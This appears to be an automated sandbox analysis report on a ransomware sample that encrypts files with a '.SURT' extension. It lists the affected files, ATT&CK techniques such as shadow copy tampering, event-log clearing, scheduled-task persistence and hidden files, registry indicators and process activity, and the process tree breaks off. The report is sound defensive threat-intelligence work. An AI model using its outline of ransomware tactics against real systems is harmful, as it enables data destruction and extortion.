File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN097.XML.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Sidebar\de-DE\sbdrop.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\JOURNAL.ELM.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\LoanAmortization.xltx.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passportcover.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Mozilla Firefox\defaultagent.ini.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre7\bin\glib-lite.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\js\calendar.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\psmachine_64.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

System Time Discovery 1 TTPs 3 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
3808	net1.exe
3896	cmd.exe
3824	net.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 3 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1420	vssadmin.exe
2136	vssadmin.exe
576	vssadmin.exe
2364	vssadmin.exe
916	vssadmin.exe
2856	vssadmin.exe
2980	vssadmin.exe
2708	vssadmin.exe
2032	vssadmin.exe
2972	vssadmin.exe
1620	vssadmin.exe
1692	vssadmin.exe
2460	vssadmin.exe
2948	vssadmin.exe
656	vssadmin.exe
2304	vssadmin.exe
1008	vssadmin.exe
1560	vssadmin.exe
2252	vssadmin.exe
324	vssadmin.exe
2956	vssadmin.exe
468	vssadmin.exe
1316	vssadmin.exe
2124	vssadmin.exe
1540	vssadmin.exe
2944	vssadmin.exe
620	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "441851596"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A3C033E0-C7D3-11EF-A2A1-C60424AAF5E1} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
7068	Process not Found

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1860	schtasks.exe
1676	schtasks.exe
6436	Process not Found

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2768	vssvc.exe
Token: SeRestorePrivilege	2768	vssvc.exe
Token: SeAuditPrivilege	2768	vssvc.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	2348	chrome.exe
Token: SeShutdownPrivilege	2348	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	4008	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	3776	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeSecurityPrivilege	3996	wevtutil.exe
Token: SeBackupPrivilege	3996	wevtutil.exe
Token: SeSecurityPrivilege	2672	wevtutil.exe
Token: SeBackupPrivilege	2672	wevtutil.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeSecurityPrivilege	1756	wevtutil.exe
Token: SeBackupPrivilege	1756	wevtutil.exe
Token: SeSecurityPrivilege	2624	wevtutil.exe
Token: SeBackupPrivilege	2624	wevtutil.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeSecurityPrivilege	3900	wevtutil.exe
Token: SeBackupPrivilege	3900	wevtutil.exe
Token: SeSecurityPrivilege	4064	wevtutil.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4620	iexplore.exe
4620	iexplore.exe
4960	IEXPLORE.EXE
4960	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 1924 wrote to memory of 2504	1924	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	31
PID 2504 wrote to memory of 2696	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	32
PID 2504 wrote to memory of 2696	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	32
PID 2504 wrote to memory of 2696	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	32
PID 2504 wrote to memory of 2548	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	33
PID 2504 wrote to memory of 2548	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	33
PID 2504 wrote to memory of 2548	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	33
PID 2504 wrote to memory of 2928	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	34
PID 2504 wrote to memory of 2928	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	34
PID 2504 wrote to memory of 2928	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	34
PID 2928 wrote to memory of 3008	2928	cmd.exe	35
PID 2928 wrote to memory of 3008	2928	cmd.exe	35
PID 2928 wrote to memory of 3008	2928	cmd.exe	35
PID 2504 wrote to memory of 1072	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	36
PID 2504 wrote to memory of 1072	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	36
PID 2504 wrote to memory of 1072	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	36
PID 2504 wrote to memory of 2816	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	38
PID 2504 wrote to memory of 2156	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	37
PID 2504 wrote to memory of 2816	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	38
PID 2504 wrote to memory of 2156	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	37
PID 2504 wrote to memory of 2816	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	38
PID 2504 wrote to memory of 2156	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	37
PID 2504 wrote to memory of 2844	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	39
PID 2504 wrote to memory of 2844	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	39
PID 2504 wrote to memory of 2844	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	39
PID 2504 wrote to memory of 2812	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	40
PID 2504 wrote to memory of 2812	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	40
PID 2504 wrote to memory of 2812	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	40
PID 2504 wrote to memory of 1076	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	41
PID 2504 wrote to memory of 1076	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	41
PID 2504 wrote to memory of 1076	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	41
PID 2504 wrote to memory of 2716	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	42
PID 2504 wrote to memory of 2716	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	42
PID 2504 wrote to memory of 2716	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	42
PID 2504 wrote to memory of 3024	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	43
PID 2504 wrote to memory of 3024	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	43
PID 2504 wrote to memory of 3024	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	43
PID 2504 wrote to memory of 3020	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	44
PID 2504 wrote to memory of 3020	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	44
PID 2504 wrote to memory of 3020	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	44
PID 2504 wrote to memory of 2728	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	45
PID 2504 wrote to memory of 2728	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	45
PID 2504 wrote to memory of 2728	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	45
PID 2504 wrote to memory of 2904	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	46
PID 2504 wrote to memory of 2904	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	46
PID 2504 wrote to memory of 2904	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	46
PID 2504 wrote to memory of 2712	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	47
PID 2504 wrote to memory of 2712	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	47
PID 2504 wrote to memory of 2712	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	47
PID 2504 wrote to memory of 2632	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	48
PID 2504 wrote to memory of 2632	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	48
PID 2504 wrote to memory of 2632	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	48
PID 2504 wrote to memory of 1704	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	49
PID 2504 wrote to memory of 1704	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	49
PID 2504 wrote to memory of 1704	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	49
PID 2504 wrote to memory of 2840	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	50
PID 2504 wrote to memory of 2840	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	50
PID 2504 wrote to memory of 2840	2504	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
580	attrib.exe
1320	Process not Found
1360	Process not Found
6528	Process not Found
6576	Process not Found
6552	Process not Found
5300	Process not Found
3548	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
  "C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"
  2⤵
